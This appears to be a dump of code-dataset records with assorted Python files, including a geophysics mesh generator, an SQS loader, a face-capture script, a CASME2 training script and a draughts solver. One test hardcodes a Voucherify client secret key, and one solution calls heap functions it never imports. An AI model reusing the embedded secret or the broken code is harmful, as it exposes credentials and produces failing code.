\t\t\t\t\t\t\t\t\t# lower center right corner\n\ny[3+ 2* (len(x_rough)-2) +3] = 0.0 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # lower left corner\ny[3+ 2* (len(x_rough)-2) +4] = 0.0 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# lower right corner\n\n# np.savetxt('x_values.txt', x)\n# np.savetxt('y_values.txt', y)\nx= x*1000.0 # convert to km\ny=y*1000.0\t\t\t\t \n \n\n# working on the element part of dynosol 2d\n\nelement= np.zeros(len_arrays+2)\npj0=\tnp.zeros(len_arrays+2)\npj1=\tnp.zeros(len_arrays+2)\nboundary_flag= np.zeros(len_arrays+2)\n\n\n\n\n# left boundary from top to bottom ----------------------\npj0[0]= 0 \npj1[0]=2\nboundary_flag[0]= 1\n\npj0[1]= 2 \npj1[1]=3+len(x_rough)-2+ 1\nboundary_flag[1]= 1\n\npj0[2]=3+len(x_rough)-2+ 1\npj1[2]=3+ 2* (len(x_rough)-2) +3\nboundary_flag[2]= 1\n\n# Bottom boundary ----------------------\n\npj0[3]= 3+ 2* (len(x_rough)-2) +3\npj1[3]= 3+ 2* (len(x_rough)-2) +4\nboundary_flag[3]= 16\n\n# Right boundary from bottom to top----------------------\npj0[4]= 3+ 2* (len(x_rough)-2) +4\npj1[4]= 3+ 2* (len(x_rough)-2) +2\nboundary_flag[4]= 2\n\npj0[5]= 3+ 2* (len(x_rough)-2) +2\npj1[5]= 3+len(x_rough)-2\nboundary_flag[5]= 2\n\npj0[6]= 3+len(x_rough)-2\npj1[6]= 1\nboundary_flag[6]= 2\n\n# Top boundary ----------------------\npj0[7]= 1\npj1[7]= 0\nboundary_flag[7]= 32\n\n# Not a boundary-- Body segments -------------------\n\n\n\nfor ii in range(len(x_rough)-1):\n\tnext_value= 8+ ii\n\tpj0[8+ ii]= 2+ii\n\tpj1[8+ii] = 2+ii +1 \n\tboundary_flag[8+ii] = 0\n\nfor ii in range(len(x_rough)-1):\t\n\tpj0[next_value+1+ii] = 3+len(x_rough)-2+ 1 + ii\n\tpj1[next_value+1+ii] = 3+len(x_rough)-2+ 1 + ii +1\n\tboundary_flag[next_value+1+ii] = 0 \n\n\n#Write output\nf = open('coupling_input.poly','w')\n\n#need to write this part\n# npoints ndims 0 0\n# 13 2 0 0\nf.write('# input file for dynosol\\n')\nf.write('# \\n')\nf.write(\"{} {} {} {}\\n\".format( '#npoints' , 'ndims', '0', '0' ) )\nf.write(\"{} {} {} {}\\n\".format( len_arrays , 2, 0, 0 ) )\nf.write(\"{} {} {} \\n\".format( '#i' , 'xi', 'yi' ) )\nfor i in range(len_arrays):\n\n\tf.write(\"{} {:E} {:E}\\n\".format(i , x[i], y[i] ) ) \n\n## nsegments 1\n# 16 1\nf.write('# segments\\n')\nf.write(\"{} {}\\n\".format( '#nsegments' , '1' ) )\nf.write(\"{:d} {:d}\\n\".format( len_arrays+2 , 1 ) )\nf.write(\"{} {} {} {}\\n\".format( '#i' , 'pj0', 'pj1', 'boundary_flag' ) )\n\n\nfor i in range(len_arrays+2):\n\tpj_0= int ( pj0[i] )\n\tpj_1 =int ( pj1[i] )\n\tboundary= int( boundary_flag[i] )\n\tf.write(\"{} {:d} {:d} {:d}\\n\".format(i , pj_0, pj_1, boundary ) ) \n#f.write('# author='+author+'\\n')\n\nf.write('# #### holes, must be 0 ####\\n')\nf.write(\"{:d}\\n\".format( 0 ) )\n\nf.write('#### regions ####\\n')\nf.write('# nregions\\n')\nf.write( \"{}\\n\".format(3) )\nf.write(\"{} {} {} {}\\n\".format( '#k' , 'xk', 'yk', 'mattype', 'size' ) )\n\n# Working on the regions part --------------------------------------\n\n\nzones_1_x = 40000.0 \nzones_1_y= 10000.0\nelement_size_1= 400000.0\nelement_type_1= 0\n\nzones_2_x = 0.0\n#zones_2_x = x_rough[1] *1000 +500\nzones_2_y= 20100.0\n#zones_2_y = y_rough[1]*1000 +500.0\nelement_size_2 = 10000.0\nelement_type_2= 1\n\nzones_3_x = 40000.0\nzones_3_y= 30000.0\nelement_size_3= 400000.0\nelement_type_3= 0\n\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(0 , zones_1_x, zones_1_y, element_type_1, element_size_1 ) )\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(1 , zones_2_x, zones_2_y, element_type_2, element_size_2 ) )\nf.write(\"{} {:E} {:E} {:d} {:E}\\n\".format(2 , zones_3_x, zones_3_y ,element_type_3, element_size_3) )\n\nf.close()\n\n\n\n\n\n\n","sub_path":"examples/input_file_script.py","file_name":"input_file_script.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528197482","text":"#\n# (c) UWA, The University of Western Australia\n# M468/35 Stirling Hwy\n# Perth WA 6009\n# Australia\n#\n# Copyright by UWA, 2012-2015\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\"\"\"\nPopulate the queue\n\"\"\"\nimport multiprocessing\nfrom helpers.logging_helper import use_multiprocessor_logging, get_logger\nfrom helpers.multiprocessing_helper import Consumer\n\nuse_multiprocessor_logging()\n\nimport argparse\nimport sys\nfrom boto.sqs.message import Message\nfrom helpers.sqs_helper import SqsHelper\n\nLOG = get_logger(__name__)\nLOG.info('PYTHONPATH = {0}'.format(sys.path))\n\nNUMBER_PROCESSES = 10\nSEGMENT = 100000 / NUMBER_PROCESSES\n\n\nclass TaskAdd(object):\n def __init__(self, range_id, args):\n self.range_id = range_id\n self.args = args\n\n def __call__(self):\n # noinspection PyBroadException\n try:\n sqs_helper = SqsHelper('us-east-1')\n queue = sqs_helper.get_queue(self.args.queue_name)\n\n for galaxy_id in range(self.range_id * SEGMENT, (self.range_id * SEGMENT) + SEGMENT):\n if self.args.verbosity >= 1 or galaxy_id % 100 == 0:\n LOG.info('Adding {0}'.format(galaxy_id))\n\n message = Message()\n message.set_body('{0}'.format(galaxy_id))\n queue.write(message)\n\n except Exception:\n LOG.exception('Task died')\n\n def __str__(self):\n return 'Adding {0}'.format(self.range_id)\n\n\ndef add_ids_to_queue(args):\n # Create the queue\n queue = multiprocessing.JoinableQueue()\n\n consumers = [Consumer(queue)\n for i in xrange(NUMBER_PROCESSES)]\n\n for consumer in consumers:\n consumer.start()\n\n if args.verbosity >= 1:\n LOG.info('Adding elements')\n\n for range_id in range(0, NUMBER_PROCESSES):\n queue.put(TaskAdd(range_id, args))\n\n # Add a poison pill for each consumer\n for i in xrange(NUMBER_PROCESSES):\n queue.put(None)\n\n # Wait for the queue to terminate\n queue.join()\n\n\ndef main():\n parser = argparse.ArgumentParser('Add galaxy ids to the queue')\n parser.add_argument(\n \"-v\",\n \"--verbosity\",\n action=\"count\",\n default=0,\n help=\"increase output verbosity\")\n parser.add_argument('queue_name', help='the queue to load')\n args = parser.parse_args()\n add_ids_to_queue(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/add_galaxy_ids_to_queue.py","file_name":"add_galaxy_ids_to_queue.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"344605608","text":"import sys\nimport numpy as np\nimport PDB_tools\n\nif __name__ == '__main__':\n data = np.array([])\n reader = PDB_tools.PDBreader(sys.argv[1])\n data = reader.getdata()\n posi = PDB_tools.Calc_data(data)\n positions = np.array([])\n positions = posi.getpositions()\n\n one_position = np.array([])\n ans = np.array([])\n counter = 0\n tmp = 0\n for i in range(len(data)):\n l = data[i].split()\n if l[0] == \"ATOM\":\n if int(l[1]) - tmp < 1 or i == len(data)-2:\n print(l[1],tmp)\n one_position = np.reshape(one_position,(int(tmp),3))\n calc = PDB_tools.Calc_data(one_position)\n ans = calc.calc_centerpositions()\n print(ans)\n one_position = np.array([])\n one_position = np.append(one_position,positions[counter])\n counter += 1\n tmp = int(l[1])\n\n #print(one_position)\n","sub_path":"cal_centerposition.py","file_name":"cal_centerposition.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446908508","text":"import cv2\nimport sys\n\n\nwebcam = cv2.VideoCapture(0) #Use camera 0\nface = cv2.CascadeClassifier('train_face.xml')\n\nwhile True:\n ret,frame = webcam.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = face.detectMultiScale(frame,1.3,5)\n padding = 10\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame,(x-padding, y-padding), (x+w+padding, y+h+padding), (255, 0, 0), 2)\n sub_face = frame[y:y+h+padding, x:x+w+padding]\n #sub_face = cv2.cvtColor(sub_face, cv2.COLOR_BGR2GRAY)\n FaceFileName = \"facesCapture/face_\" + str(y) + \".jpg\"\n cv2.imwrite(FaceFileName,sub_face)\n cv2.imshow(\"Detecting and storing face\",frame)\n if cv2.waitKey(1)== ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n\n\n\n \n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"415128550","text":"import time\nimport numpy as np\nfrom pyquaternion import Quaternion\n\n\ndef tf(position):\n pos, orn = position\n pos = np.array(pos)\n if not isinstance(orn, Quaternion):\n orn = Quaternion(orn[3], *orn[:3])\n return pos, orn\n\n\nclass KinematicConstraint(object):\n def __init__(self, base_position, child_position):\n base_pos, base_orn = tf(base_position)\n child_pos, child_orn = tf(child_position)\n pos = base_orn.inverse.rotate(child_pos - base_pos)\n orn = base_orn.inverse * child_orn\n self._constraint = pos, orn\n\n def get_child(self, base_position):\n base_pos, base_orn = tf(base_position)\n pos, orn = self._constraint\n pos = base_pos + base_orn.rotate(pos)\n orn = base_orn * orn\n return pos, orn\n\n\nclass Rate(object):\n def __init__(self, time_step):\n self._time_step = time_step\n self._next_time = time.time() + time_step\n\n def sleep(self):\n t = time.time()\n if t < self._next_time:\n time.sleep(self._next_time - t)\n else:\n time.sleep(1e-6)\n self._next_time += self._time_step","sub_path":"mime/agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"478720487","text":"import argparse\nimport os\nimport shutil\nimport logging\nimport time\nimport pickle\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom models import MySTCNN, MyC3D\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import AverageMeter, accuracy, Bar\n\nparser = argparse.ArgumentParser()\n\n# datasets\nparser.add_argument('-d', '--dataset', default='casme2', type=str)\n# parser.add_argument('--dataset-path', default='dataset/CASME2_224_15frames.pickle')\nparser.add_argument('--dataset-path', default='dataset/CASME2_BGR_224_15frames.pickle')\nparser.add_argument('-f', '--folds', default=10, type=int, help='k-folds cross validation')\n\n# optimization options\nparser.add_argument('--epochs', default=20, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--train_batch', default=2, type=int, metavar='N',\n help='train batchsize')\nparser.add_argument('--test-batch', default=2, type=int, metavar='N',\n help='test batchsize')\nparser.add_argument('--lr', '--learning-rate', default=0.0001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--drop', '--dropout', default=0, type=float,\n metavar='Dropout', help='Dropout ratio')\nparser.add_argument('--schedule', type=int, nargs='+', default=[20, 30, 40],\n help='Decrease learning rate at these epochs.')\nparser.add_argument('--gamma', type=float, default=0.90, help='LR is multiplied by gamma on schedule.')\nparser.add_argument('--momentum', default=0.8, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-3, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\n\n# checkpoints\nparser.add_argument('-c', '--checkpoint', default='checkpoints/casme2_c3d', type=str, metavar='PATH',\n help='path to save checkpoint (default:checkpoint)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH')\n\n# architecture\nparser.add_argument('--arch', '-a', metavar='ARCH', default='c3d')\n\n# miscs\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nargs = parser.parse_args()\nstate = {k: v for k, v in args._get_kwargs()}\n\n# use CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Random seed\nif args.manualSeed is None:\n args.manualSeed = random.randint(1, 10000)\nrandom.seed(args.manualSeed)\ntorch.manual_seed(args.manualSeed)\nif use_cuda:\n torch.cuda.manual_seed_all(args.manualSeed)\n\nbest_acc = 0 # best test accuracy\n\ndef main():\n global best_acc\n start_epoch = args.start_epoch\n\n # 创建 checkpoint 目录\n if not os.path.isdir(args.checkpoint):\n os.makedirs(args.checkpoint)\n\n # load data\n print('==> Preparing dataset %s' % args.dataset)\n with open(args.dataset_path, 'rb') as f:\n data = pickle.load(f)\n\n # model\n # print(\"==> creating model '{}'\".format(args.arch))\n model = MyC3D(with_classifier=True, num_classes=5)\n if use_cuda:\n model = model.cuda()\n\n # criterion\n criterion = nn.CrossEntropyLoss()\n\n # optimizer\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # set up logging\n logging.basicConfig(level=logging.DEBUG,\n filename=os.path.join(args.checkpoint, 'log_info.log'),\n filemode='a+',\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n \n # log configuration\n logging.info('-' * 10 + 'configuration' + '*' * 10)\n for arg in vars(args):\n logging.info((arg, str(getattr(args, arg))))\n\n # 10-fold cv\n acc_fold = []\n reset_lr = state['lr']\n for f_num in range(args.folds):\n state['lr'] = reset_lr\n\n # model\n model = MyC3D(with_classifier=True, num_classes=5)\n if use_cuda:\n model = model.cuda()\n model.reset_all_weights()\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n average_acc = 0\n best_acc = 0\n\n # prepare input\n train_img, train_label, test_img, test_label = data[f_num]['train_img'], data[f_num]['train_label'], data[f_num]['test_img'], data[f_num]['test_label']\n\n train_img = torch.tensor(train_img, dtype=torch.float) / 255.0 # (b_s, frames, h, w)\n train_img = train_img.permute(0, 4, 1, 2, 3)\n # train_img = train_img.unsqueeze(1)\n\n test_img = torch.tensor(test_img, dtype=torch.float) / 255.0\n test_img = test_img.permute(0, 4, 1, 2, 3)\n # test_img = test_img.unsqueeze(1)\n\n train_label, test_label = torch.tensor(train_label, dtype=torch.long), torch.tensor(test_label, dtype=torch.long)\n\n train_dataset = torch.utils.data.TensorDataset(train_img, train_label)\n train_iter = torch.utils.data.DataLoader(\n dataset=train_dataset,\n batch_size=args.train_batch,\n shuffle=True\n )\n\n test_dataset = torch.utils.data.TensorDataset(test_img, test_label)\n test_iter = torch.utils.data.DataLoader(\n dataset=test_dataset,\n batch_size=args.test_batch,\n shuffle=False\n )\n # train and val\n for epoch in range(start_epoch, args.epochs):\n # 在特定的epoch 调整学习率\n adjust_learning_rate(optimizer, epoch)\n\n print('\\nEpoch: [%d | %d] LR: %f' % (epoch + 1, args.epochs, optimizer.param_groups[0]['lr']))\n \n train_loss, train_acc = train(train_iter, model, criterion, optimizer, epoch, use_cuda)\n test_loss, test_acc = test(test_iter, model, criterion, epoch, use_cuda)\n\n # logger\n\n # save model\n is_best = test_acc > best_acc\n best_acc = max(test_acc, best_acc)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': test_acc,\n 'best_acc': best_acc,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, f_num, checkpoint=args.checkpoint)\n \n # compute average acc\n acc_fold.append(best_acc)\n average_acc = sum(acc_fold) / len(acc_fold)\n\n logging.info('fold: %d, best_acc: %.2f, average_acc: %.2f' % (f_num, best_acc, average_acc))\n \n\n\ndef train(train_iter, model, criterion, optimizer, epoch, user_cuda):\n # switch to train mode\n model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n end = time.time()\n\n bar = Bar('Processing', max=len(train_iter))\n for batch_idx, (inputs, targets) in enumerate(train_iter):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n \n # compute output\n per_outputs = model(inputs)\n\n per_loss = criterion(per_outputs, targets)\n\n loss = per_loss\n\n # measure accuracy and record loss\n prec = accuracy(per_outputs.data, targets.data, topk=(1,))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec[0].item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f}'.format(\n batch=batch_idx+1,\n size=len(inputs),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td,\n loss=losses.avg,\n top1=top1.avg,\n )\n bar.next()\n bar.finish()\n return (losses.avg, top1.avg)\n\ndef test(test_iter, model, criterion, epoch, use_cuda):\n global best_acc\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n bar = Bar('Processing', max=len(test_iter))\n for batch_idx, (inputs, targets) in enumerate(test_iter):\n # measure data loading time\n data_time.update(time.time() - end)\n\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n # inputs, targets = torch.autograd.Variable(inputs, volatile=True), torch.autograd.Variable(targets)\n\n # compute output\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n \"\"\"\n np_inputs = inputs.numpy()\n np_att = attention.numpy()\n for item_in, item_att in zip(np_inputs, np_att):\n print(item_in.shape, item_att.shape)\n \"\"\"\n\n # measure accuracy and record loss\n prec = accuracy(outputs.data, targets.data, topk=(1,))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec[0].item(), inputs.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # plot progress\n bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f}'.format(\n batch=batch_idx+1,\n size=len(inputs),\n data=data_time.avg,\n bt=batch_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td,\n loss=losses.avg,\n top1=top1.avg,\n )\n bar.next()\n bar.finish()\n return (losses.avg, top1.avg)\n\ndef save_checkpoint(state, is_best, f_num, checkpoint='checkpoint', filename='checkpoint.pth.tar'):\n filepath = os.path.join(checkpoint, 'fold_' + str(f_num) + '_' + filename)\n torch.save(state, filepath)\n if is_best:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'fold_' + str(f_num) + '_model_best.pth.tar'))\n\n\ndef adjust_learning_rate(optimizer, epoch):\n global state\n if epoch in args.schedule:\n state['lr'] *= args.gamma\n for param_group in optimizer.param_groups:\n param_group['lr'] *= args.gamma\n\n\nif __name__ == '__main__':\n main()","sub_path":"casme2_c3d.py","file_name":"casme2_c3d.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152846897","text":"\n\ndef find_white(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] == \"o\":\n return [i, j]\ndef check_move(oboard, white ,dir):\n board = oboard\n wcol = white[1]\n wrow = white[0]\n list_b = []\n\n #left\n if dir == 0:\n if wcol!= 0:\n done = False\n for i in range(wcol - 1, -1, -1):\n interested = board[wrow][i]\n if not done:\n if interested == 'x':\n if i != 0:\n for j in range(i - 1, -1, -1):\n if board[wrow][j] == '.':\n list_b.append([wrow, j])\n elif board[wrow][j] == 'x':\n done = True\n break\n else:\n break\n\n #top\n elif dir == 1:\n if wrow!=0:\n done = False\n for i in range(wrow - 1, -1, -1):\n interested = board[i][wcol]\n if not done:\n if interested == 'x':\n if i != 0:\n for j in range(i - 1, -1, -1):\n if board[j][wcol] == '.':\n list_b.append([j, wcol])\n elif board[j][wcol] == 'x':\n done = True\n break\n else:\n break\n #right\n elif dir == 2:\n if wcol != 7:\n done = False\n for i in range(wcol+1, 8):\n interested = board[wrow][i]\n if not done:\n if interested == 'x':\n if i != 7:\n for j in range(i + 1, 8):\n if board[wrow][j] == '.':\n list_b.append([wrow, j])\n elif board[wrow][j] == 'x':\n done = True\n break\n else:\n break\n #down\n elif dir == 3:\n if wrow != 7:\n done = False\n for i in range(wrow + 1, 8):\n interested = board[i][wcol]\n if not done:\n if interested == 'x':\n if i != 7:\n for j in range(i + 1, 8):\n if board[j][wcol] == '.':\n list_b.append([j, wcol])\n elif board[j][wcol] == 'x':\n done = True\n break\n else:\n break\n return list_b\n\ndef check_move2(board, white):\n list_b = []\n wcol = white[1]\n wrow = white[0]\n #left\n if wcol > 1:\n if board[wrow][wcol-1] == 'x':\n if board[wrow][wcol-2] == '.':\n list_b.append([wrow, wcol-2])\n #top\n if wrow > 1:\n if board[wrow - 1][wcol] == 'x':\n if board[wrow - 2][wcol] == '.':\n list_b.append([wrow - 2, wcol])\n\n #right\n if wcol < 6:\n if board[wrow][wcol + 1] == 'x':\n if board[wrow][wcol + 2] == '.':\n list_b.append([wrow, wcol + 2])\n\n return list_b\n\n\n\n\ndef validmoves(board, king, eat, last):\n pos = find_white(board)\n tmoves = []\n if king:\n if not eat:\n for i in range(4):\n moves = check_move(board,pos, i)\n for j in moves:\n tmoves.append(j)\n if eat:\n for i in range(4):\n if i != last:\n moves = check_move(board, pos, i)\n for j in moves:\n tmoves.append(j)\n else:\n tmoves = check_move2(board,pos)\n\n return tmoves\ndef which_dir(old, new):\n if new[0] - old[0] == 0:\n if new[1] - old[1] > 0:\n return 0\n elif new[1] - old[1] < 0:\n return 2\n elif new[0] - old[0] > 0:\n return 1\n elif new[0] - old[0] <0:\n return 3\n\ndef win(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] == 'x':\n return False\n return True\ndef del_black(oboard, origin, target):\n board = oboard[:]\n if target[0] - origin[0] == 0:\n if target[1] - origin[1] > 0:\n for i in range(origin[1]+1, target[1]):\n if board[origin[0]][i] == 'x':\n board[origin[0]] = list(board[origin[0]])\n board[origin[0]][i] = '.'\n board[origin[0]] = ''.join(board[origin[0]])\n elif target[1] - origin[1] < 0:\n for i in range(target[1] + 1, origin[1]):\n if board[origin[0]][i] == 'x':\n board[origin[0]] = list(board[origin[0]])\n board[origin[0]][i] = '.'\n board[origin[0]] = ''.join(board[origin[0]])\n\n elif target[1] - origin[1] == 0:\n if target[0] - origin[0] > 0:\n for i in range(origin[0] + 1, target[0]):\n if board[i][origin[1]] == 'x':\n board[i] = list(board[i])\n board[i][origin[1]] = '.'\n board[i] = ''.join(board[i])\n\n elif target[0] - origin[0] < 0:\n\n for i in range(target[0] + 1, origin[0]):\n if board[i][origin[1]] == 'x':\n board[i] = list(board[i])\n board[i][origin[1]] = '.'\n board[i] = ''.join(board[i])\n\n return board\ndef print_board(board):\n for i in range(8):\n for j in range(8):\n print(board[i][j], end=' ')\n print()\n\ndef move_the_white(oboard, old, last, king):\n board = oboard\n if win(board):\n return 1\n\n wpos = find_white(board)\n moves = []\n #print(old, end='--')\n #print(wpos, end = ':')\n\n if wpos[0] == 0:\n king = True\n\n\n if last != None:\n moves = validmoves(board, king, True, last)\n else:\n moves = validmoves(board, king, False, last)\n\n if len(moves) == 0:\n #print(\"o\")\n return 0\n\n total_i_dim = 0\n #print(moves)\n #print()\n for i in range(len(moves)):\n new_board = board[:]\n new_move = moves[i]\n\n new_board = del_black(new_board, wpos, new_move)\n new_board[wpos[0]] = list(new_board[wpos[0]])\n new_board[wpos[0]][wpos[1]] = '.'\n new_board[wpos[0]] = ''.join(new_board[wpos[0]])\n\n new_board[new_move[0]] = list(new_board[new_move[0]])\n new_board[new_move[0]][new_move[1]] = 'o'\n new_board[new_move[0]] = ''.join(new_board[new_move[0]])\n #print_board(new_board)\n\n last = which_dir(wpos, new_move)\n total_i_dim += move_the_white(new_board, wpos, last, king)\n\n\n return total_i_dim\n\ncases = int(input())\nfor case in range(cases):\n board = []\n for i in range(8):\n row = input()\n board.append(row)\n if case+1 != cases:\n blank = input()\n wpos = find_white(board)\n a = None\n total = move_the_white(board, wpos, a, False)\n print(total)","sub_path":"draughts.py","file_name":"draughts.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"584611983","text":"import heapq\nfrom collections import deque\n\n\nclass Solution:\n def rearrangeString(self, words, k):\n \"\"\"\n Time complexity:\n The time complexity of the above algorithm is O(N*logN) where ‘N’\n is the number of characters in the input string.\n\n Space complexity:\n The space complexity will be O(N), as in the worst case, we need to\n store all the ‘N’ characters in the HashMap.\n \"\"\"\n\n if k <= 1:\n return words\n\n charFrequencyMap = {}\n for char in words:\n charFrequencyMap[char] = charFrequencyMap.get(char, 0) + 1\n\n maxHeap = []\n # add all characters to the max heap\n for char, frequency in charFrequencyMap.items():\n heappush(maxHeap, (-frequency, char))\n\n queue = deque()\n resultString = []\n while maxHeap:\n frequency, char = heappop(maxHeap)\n # append the current character to the result string and decrement its count\n resultString.append(char)\n # decrement the frequency and append to the queue\n queue.append((char, frequency+1))\n if len(queue) == k:\n char, frequency = queue.popleft()\n if -frequency > 0:\n heappush(maxHeap, (frequency, char))\n\n # if we were successful in appending all the characters to the result string, return it\n return ''.join(resultString) if len(resultString) == len(words) else \"\"\n","sub_path":"Problems/Leetcode/358_RearrangeStringkDistanceApart.py","file_name":"358_RearrangeStringkDistanceApart.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82666637","text":"from voucherify import Client as voucherifyClient\n\nvoucherify = voucherifyClient(\n application_id=\"c70a6f00-cf91-4756-9df5-47628850002b\",\n client_secret_key=\"3266b9f8-e246-4f79-bdf0-833929b1380c\"\n)\n\ntracking_id = 'PythonTestUser'\ntestVoucher = {\n \"code\": \"PythonVoucherTest\",\n \"discount\": {\n \"type\": \"AMOUNT\",\n \"amount_off\": 12436\n },\n \"category\": \"PythonTestCategory\",\n \"start_date\": \"2016-01-01T00:00:00Z\",\n \"expiration_date\": None,\n \"redemption\": {\n \"quantity\": None,\n \"redeemed_quantity\": 0\n },\n \"active\": True\n}\n\n\ndef test_publishVoucher():\n params = {\n \"channel\": \"Email\",\n \"customer\": \"donny.roll@mail.com\"\n }\n result = voucherify.distributions.publish(params)\n assert result.get('active') is True\n assert result.get('type') == 'DISCOUNT_VOUCHER'\n","sub_path":"tests/test_distributions_e2e.py","file_name":"test_distributions_e2e.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479014047","text":"import re\nfrom tkinter import *\n\ndef handle_x(x):\n a = re.split(r'[\\+\\-\\*\\/\\(\\)]', x)\n b = re.findall(r'[\\+\\-\\*\\/\\(\\)]', x)\n t = [rv for r in zip(a, b) for rv in r]\n t = list(filter(lambda x: x != '', t))\n if len(a) > len(b):\n t.append(a[len(a) - 1])\n else:\n t.append(b[len(b) - 1])\n return t\n\nclass Stack:\n def __init__(self):\n self.items = []\n\n def isEmpty(self):\n return self.items == []\n\n def push(self, item):\n self.items.append(item)\n\n def pop(self):\n return self.items.pop()\n\n def peek(self):\n return self.items[len(self.items) - 1]\n\n def size(self):\n return len(self.items)\n\ndef postfix(a):\n x={}\n x['*']=3;x['/']=3;x['+']=2;x['-']=2;x['(']=1\n opstack=Stack()\n poststack=[]\n tokenlist=handle_x(a)\n print(tokenlist)\n for token in tokenlist:\n if re.match(r'\\d+',token):\n poststack.append(token)\n elif token == '(':\n opstack.push(token)\n elif token == ')':\n toptoken=opstack.pop()\n while toptoken != '(':\n poststack.append(toptoken)\n toptoken = opstack.pop()\n else:\n while (not opstack.isEmpty()) and (x[opstack.peek()]>=x[token]):\n poststack.append(opstack.pop())\n opstack.push(token)\n while not opstack.isEmpty():\n poststack.append(opstack.pop())\n return poststack\n\ndef calcu(a):\n realstack=Stack()\n for i in a:\n if re.match(r'\\d+', i):\n realstack.push(i)\n elif i == '+':\n t1=realstack.pop()\n t2=realstack.pop()\n realstack.push(int(t2)+int(t1))\n elif i == '-':\n t1 = realstack.pop()\n t2 = realstack.pop()\n realstack.push(int(t2) - int(t1))\n elif i == '*':\n t1 = realstack.pop()\n t2 = realstack.pop()\n realstack.push(int(t2) *int(t1))\n elif i == '/':\n t1 = realstack.pop()\n t2 = realstack.pop()\n realstack.push(int(t2) / int(t1))\n return realstack.pop()\n\ndef fuck(x):\n x=postfix(x)\n return calcu(x)\n\ndef frame(root, 